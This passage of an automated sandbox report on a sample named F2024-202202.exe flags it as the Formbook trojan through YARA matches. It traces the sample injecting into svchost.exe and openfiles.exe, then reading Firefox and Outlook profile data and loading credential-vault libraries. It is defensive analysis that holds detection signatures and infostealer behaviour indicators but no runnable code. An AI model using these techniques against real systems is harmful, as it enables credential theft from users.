            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C1F925_2_044C1F92
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FFB15_2_0457FFB1
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0452D8005_2_0452D800
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C38E05_2_044C38E0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044C99505_2_044C9950
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DB9505_2_044DB950
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_045559105_2_04555910
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04577A465_2_04577A46
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FA495_2_0457FA49
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04533A6C5_2_04533A6C
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0456DAC65_2_0456DAC6
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04505AA05_2_04505AA0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04561AA35_2_04561AA3
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0455DAAC5_2_0455DAAC
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0457FB765_2_0457FB76
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_04535BF05_2_04535BF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044FDBF95_2_044FDBF9
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_044DFB805_2_044DFB80
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_001431305_2_00143130
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013E2F75_2_0013E2F7
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013E3005_2_0013E300
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013E5205_2_0013E520
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013C5A05_2_0013C5A0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0013C6E45_2_0013C6E4
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00144AF05_2_00144AF0
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_00144AEB5_2_00144AEB
            Source: C:\Windows\SysWOW64\openfiles.exeCode function: 5_2_0015B7C05_2_0015B7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 034AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0342B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03475130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03487E54 appears 111 times
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: String function: 001A0D27 appears 70 times
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: String function: 00187F41 appears 35 times
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: String function: 001A8B40 appears 42 times
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: String function: 04507E54 appears 111 times
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: String function: 044AB970 appears 280 times
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: String function: 044F5130 appears 58 times
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: String function: 0453F290 appears 105 times
            Source: C:\Windows\SysWOW64\openfiles.exe | Code function: String function: 0452EA12 appears 86 times
            Source: F2024-202202.exe, 00000000.00000003.2014549447.000000000400D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs F2024-202202.exe
            Source: F2024-202202.exe, 00000000.00000003.2013038291.0000000003E63000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs F2024-202202.exe
            Source: F2024-202202.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3252950287.0000000002650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2345744782.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3254116085.00000000033E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3252870052.00000000005F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3255683162.0000000004AC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3252524118.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2345390681.0000000003280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2345007571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@5/3
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001EA2D5 GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001D8713 AdjustTokenPrivileges,CloseHandle
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001D8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001EB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001FF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_001EC602 CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\F2024-202202.exe | Code function: 0_2_00184FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
            Source: C:\Users\user\Desktop\F2024-202202.exe | File created: C:\Users\user\AppData\Local\Temp\aut3BCF.tmp
            Source: F2024-202202.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Users\user\Desktop\F2024-202202.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: openfiles.exe, 00000005.00000002.3253131424.00000000027FE000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3253131424.00000000027D0000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2574212142.00000000027D0000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2576028559.00000000027DA000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2574088010.00000000027AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknown | Process created: C:\Users\user\Desktop\F2024-202202.exe "C:\Users\user\Desktop\F2024-202202.exe"
            Source: C:\Users\user\Desktop\F2024-202202.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\F2024-202202.exe"
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Process created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
            Source: C:\Windows\SysWOW64\openfiles.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\F2024-202202.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: framedynos.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\openfiles.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\openfiles.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: F2024-202202.exe | Static file information: File size 1165312 > 1048576
            Source: F2024-202202.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: F2024-202202.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: F2024-202202.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: F2024-202202.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: F2024-202202.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: F2024-202202.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: F2024-202202.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: OpnFiles.pdb source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HCyQCFLUGWqlxNRVXC.exe, 00000004.00000000.2264662254.000000000010E000.00000002.00000001.01000000.00000005.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410177309.000000000010E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: F2024-202202.exe, 00000000.00000003.2014375055.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, F2024-202202.exe, 00000000.00000003.2014549447.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2248825396.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2345425779.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2250328113.0000000003200000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, openfiles.exe, 00000005.00000002.3254305828.000000000461E000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2345302031.0000000004115000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254305828.0000000004480000.00000040.00001000.00020000.00000000.sdmp, openfiles.exe, 00000005.00000003.2347471193.00000000042CC000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: OpnFiles.pdbGCTL source: svchost.exe, 00000002.00000003.2309893879.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309986096.0000000002E2B000.00000004.00000020.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2562919899.0000000000F29000.00000004.00000001.00020000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000004.00000003.2279464547.0000000000F1B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: openfiles.exe, 00000005.00000002.3253131424.000000000275A000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000005.00000002.3254850708.0000000004AAC000.00000004.10000000.00040000.00000000.sdmp, HCyQCFLUGWqlxNRVXC.exe, 00000006.00000000.2410616230.000000000268C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.2680745913.0000000003A5C000.00000004.80000000.00040000.00000000.sdmp
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: F2024-202202.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001FC304 LoadLibraryA,GetProcAddress, 0_2_001FC304
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_0018C590 push eax; retn 0018h 0_2_0018C599
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_001A8B85 push ecx; ret 0_2_001A8B98
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A01C push edi; ret 2_2_0041A02C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A023 push edi; ret 2_2_0041A02C
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040E158 push ss; iretd 2_2_0040E162
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00415A73 push ebx; retn 5C84h 2_2_00415AFB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00419AD8 push ebx; retf 2_2_00419B00
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041537E push edi; iretd 2_2_00415380
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00413321 push eax; ret 2_2_00413361
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041BC13 push esi; retf 2_2_0041BC1E
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041BCFA push eax; iretd 2_2_0041BCFB
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00415DDC push cs; ret 2_2_00415DE0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403580 push eax; ret 2_2_00403582
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00419583 push edi; iretd 2_2_0041958F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0042FE02 push eax; ret 2_2_0042FE04
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0340225F pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034027FA pushad ; ret 2_2_034027F9
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_034309AD push ecx; mov dword ptr [esp], ecx 2_2_034309B6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0340283D push eax; iretd 2_2_03402858
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0340135E push eax; iretd 2_2_03401369
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_0345EB23 push edi; iretd 4_2_0345EB6D
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_03463B29 push ecx; retf 4_2_03463B2A
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_0345A3D7 push eax; iretd 4_2_0345A3D8
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_03453A5B push edi; iretd 4_2_03453A5D
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_0345A2F0 push esi; retf 4_2_0345A2FB
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_0345EA8D push edi; iretd 4_2_0345EB6D
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_034519FE push eax; ret 4_2_03451A3E
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_034581B5 push ebx; retf 4_2_034581DD
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_0344C835 push ss; iretd 4_2_0344C83F
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_03458700 push edi; ret 4_2_03458709
            Source: C:\Program Files (x86)\UXVNQUrSRqPxRBadJxKVFWzheeXuHYzhxNkawFDyQsGqAmMlIMgVqlRJUDHmkbuivlSB\HCyQCFLUGWqlxNRVXC.exe Code function: 4_2_034586F9 push edi; ret 4_2_03458709
            Source: C:\Users\user\Desktop\F2024-202202.exe Code function: 0_2_00184A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00184A35
